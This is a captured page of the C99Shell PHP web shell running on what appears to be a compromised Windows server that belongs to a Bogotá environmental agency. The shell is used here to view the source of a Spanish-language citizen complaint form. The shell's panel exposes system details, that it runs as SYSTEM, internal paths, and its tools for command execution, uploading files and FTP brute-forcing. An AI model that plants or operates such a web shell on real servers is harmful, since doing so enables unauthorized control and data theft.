!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\quejas2006\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     nueva.php (9.79 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
session_start(); 
$_SESSION['anonimo'];
session_destroy(); 
?> 
<html>
<head>
<script type="text/JavaScript">
function validar(formulario) {
if (quejas.nombre.value.length > 1 && quejas.nombre.value.length < 4) {
    alert("Escriba por lo menos 4 caracteres en el campo \"Nombre\".");
    formulario.nombre.focus();
    return (false);
  }
  if (quejas.nombre.value.length > 50) {
    alert("Escriba máximo 8 caracteres en el campo \"Nombre\".");
    formulario.nombre.focus();
    return (false);
  }

  var checkOK = "ABCDEFGHIJKLMNÑOPQRSTUVWXYZÁÉÍÓÚ." + "abcdefghijklmnñopqrstuvwxyzáéíóú ";
  var checkStr = quejas.nombre.value;
  var allValid = true;
  for (i = 0; i < checkStr.length; i++) {
    ch = checkStr.charAt(i);
    for (j = 0; j < checkOK.length; j++)
      if (ch == checkOK.charAt(j))
        break;
    if (j == checkOK.length) {
      allValid = false;
      break;
    }
  }
  if (!allValid) {
    alert("Escriba sólo letras, puntos o espacios en el campo \"Nombre\".");
    quejas.nombre.focus();
    return (false);
  }

  var carAnterior = ' ';
  var carActual = ' ';
  var primero = true;
  var correcto = true;
  var contador = 0;
  
  for (i = 0; i < checkStr.length; i++) {
    carActual = checkStr.charAt(i);
    if(primero)
    {
        contador = 1;
        primero = false;
    }
    else
    {
        if(carActual == carAnterior)
        {
            contador++;
            if(contador >=3)
            {
                correcto = false;
                break;
            }
        }
        else
        {
            contador = 1;
        }
    }
    carAnterior = carActual;
  }    
    
  if (!correcto) {
    alert("Un caracter esta repetido más de tres veces en el campo \"Nombre\".");
    formulario.nombre.focus();
    return (false);
  }
  


//if (quejas.nombre.value.length > 1 &&  quejas.nombre.value.length < 4) {
//alert("Debe escribir un nombre válido");
//quejas.nombre.focus();
//return (false);
//}
if (quejas.id.value.length > 1 &&  quejas.id.value.length < 5) {
alert("Debe escribir un número de documento válido");
quejas.id.focus();
return (false);
}
if (quejas.id.value.length > 12) {
alert("Debe escribir un número de documento válido. Máx 12 NÚMEROS");
quejas.id.focus();
return (false);
}
//
  var checkOK = "0123456789";
  var checkStr = quejas.id.value;
  var allValid = true;
  for (i = 0; i < checkStr.length; i++) {
    ch = checkStr.charAt(i);
    for (j = 0; j < checkOK.length; j++)
      if (ch == checkOK.charAt(j))
        break;
    if (j == checkOK.length) {
      allValid = false;
      break;
    }
  }
  if (!allValid) {
    alert("Escriba sólo Números en el campo \"Número de Identificación\".");
    formulario.nombre.focus();
    return (false);
  }
//
if (quejas.nombre.value.length < 1 && quejas.id.value== "" && quejas.anonimo.checked== false) {
alert("Si su queja es anónima, por favor marque la casilla \"Deseo enviar mi queja de manera anónima\"\n o diligencie Nombre e Identificación");
quejas.anonimo.focus();
return (false);
}

if (quejas.nombre.value.length < 1 && quejas.id.value!== "" && quejas.anonimo.checked== false) {
alert("Debe escribir el nombre que corresponde al documento digitado o enviar su queja de manera anónima");
quejas.nombre.focus();
return (false);
}
if (quejas.nombre.value.length!== ""  && quejas.id.value== "" && quejas.anonimo.checked== false) {
alert("Debe escribir el número del documento que corresponde al nombre digitado o enviar su queja de manera anónima");
quejas.id.focus();
return (false);
}
//
if (quejas.nombre.value.length!== 0  && quejas.id.value!== "" && quejas.direccion.value== "" && quejas.email.value== "" && quejas.anonimo.checked== false ) {
alert("Para poder dar trámite a su queja necesitamos conocer su dirección o correo electrónico");
quejas.id.focus();
return (false);
}

//

if (quejas.telefono.value.length > 1 &&  quejas.telefono.value.length < 5) {
alert("Debe escribir un número telefónico válido");
quejas.telefono.focus();
return (false);
}

if (quejas.direccion.value.length > 1 &&  quejas.direccion.value.length < 8) {
alert("Debe escribir una dirección válida");
quejas.direccion.focus();
return (false);
}


if (quejas.email.value != "") { 

if (quejas.email.value.indexOf("@") == -1 || quejas.email.value.indexOf(".") == -1 || quejas.email.value.indexOf(" ") != -1 || quejas.email.value.length < 6)
   { alert("Direción de correo eléctrónico NO válida.");
return false; 
}
}


//if ((quejas.email.value.length > 0 && (quejas.email.value.indexOf("@",0) == - 1 || quejas.email.value.indexOf(".",0) == - 1))) { 
//alert("Debe escribir una dirección de correo válida."); 
//return (false);
//} 



}

function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }



</script>
<title>QUEJAS</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" href="/css/estilos.css">
</head>

<body>
<table width="550" border="0" align="center" cellpadding="0" cellspacing="0"  style="border:solid 4px #f0f0f0">
  <tr> 
    <td><img src="/images/quejas.jpg" width="900" height="120"></td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td><form method="post" name="quejas" onSubmit= "return validar(this)" action="procesasegunda.php" id="quejas">
        <br>
        <table width="95%" border="0" align="center" cellpadding="4" cellspacing="0">
          <tr> 
            <td width="138" height="25" align="left" valign="top" class="txt"> 

               Nombre Completo:</td>
            <td width="717" height="25" class="txt"> <input name="nombre" type="text" id="nombre"  onfocus="this.style.border='2px solid #000'" 
      onblur="this.style.border='2px solid #ccc'" size="40" maxlength="50"/> &nbsp;</td>
          </tr>
          <tr> 
            <td width="138" height="25" align="left" valign="top" class="txt">Tipo de documento:</td>
            <td class="txt"> <span class="textopequeno"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
              </font></span> 
              <select name="kindid" id="kindid">
                <option value="cc">C&eacute;dula de Ciudadan&iacute;a</option>
                <option value="ti">Tarjeta de Identidad</option>
                <option value="ce">C&eacute;dula de Extranjer&iacute;a</option>
              </select> <span class="textopequeno">&nbsp;<font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <label for="id"><font size="1">Número:</font></label>
              </font></span><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <label for="id"></label>
              <input name="id" type="text" id="id" size="20" maxlength="20" onFocus="this.style.border='2px solid #000'" 
      onblur="this.style.border='2px solid #ccc'"  onkeypress="return isNumberKey(event)">
              <span class="textopequeno"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">*Solo 
              n&uacute;meros</font></span></font></td>
          </tr>
          <tr> 
            <td width="138" height="25" align="left" valign="top" class="txt"> 
              
                Dirección:
             </td>
            <td height="25" class="txt"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="direccion" type="text" id="direccion" size="40" maxlength="100" onFocus="this.style.border='2px solid #000'" 
      onblur="this.style.border='2px solid #ccc'">
              </font></td>
          </tr>
          <tr> 
            <td width="138" height="25" align="left" valign="top" class="txt"> 
         
                Teléfono:
           </td>
            <td height="25" class="txt"><font face="Verdana, Arial, Helvetica, sans-serif"><font face="Verdana, Arial, Helvetica, sans-serif"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="telefono" type="text" id="telefono" size="15" maxlength="15"onfocus="this.style.border='2px solid #000'" 
      onblur="this.style.border='2px solid #ccc'">
              </font></font></font></td>
          </tr>
          <tr> 
            <td height="25" align="left" valign="top" class="txt">Correo electr&oacute;nico:</td>
            <td height="25" class="txt"><font face="Verdana, Arial, Helvetica, sans-serif"><font face="Verdana, Arial, Helvetica, sans-serif"><font size="2"> 
              <input name="email" type="text" id="email" size="40"onfocus="this.style.border='2px solid #000'" 
      onblur="this.style.border='2px solid #ccc'">
              </font></font></font></td>
          </tr>
          <tr> 
            <td height="25" align="left" valign="top" class="txt"><div align="right"></div></td>
            <td height="25" class="txt"><input type="checkbox" name="anonimo" id="anonimo"> 
          Deseo enviar mi queja de manera anónima.
              &nbsp;</td>
          </tr>
          <tr> 
            <td height="25" align="left" valign="top" class="txt">&nbsp;</td>
            <td height="25" class="txt"><br>
              <a href="javascript:void(0);" onClick="window.history.back();"><img src="../../images/regresar.jpg" width="187" height="53" border="0"></a> 
              <input name="Submit" type="image" src="/images/conti.jpg"></td>
          </tr>
          <tr> 
            <td height="25" align="left" valign="top" class="txt">&nbsp;</td>
            <td height="25" class="txt">&nbsp;</td>
          </tr>
        </table>
      </form></td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="80" align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Secretar&iacute;a 
      Distrital de Ambiente<br>
      Bogot&aacute; Colombia</font></td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--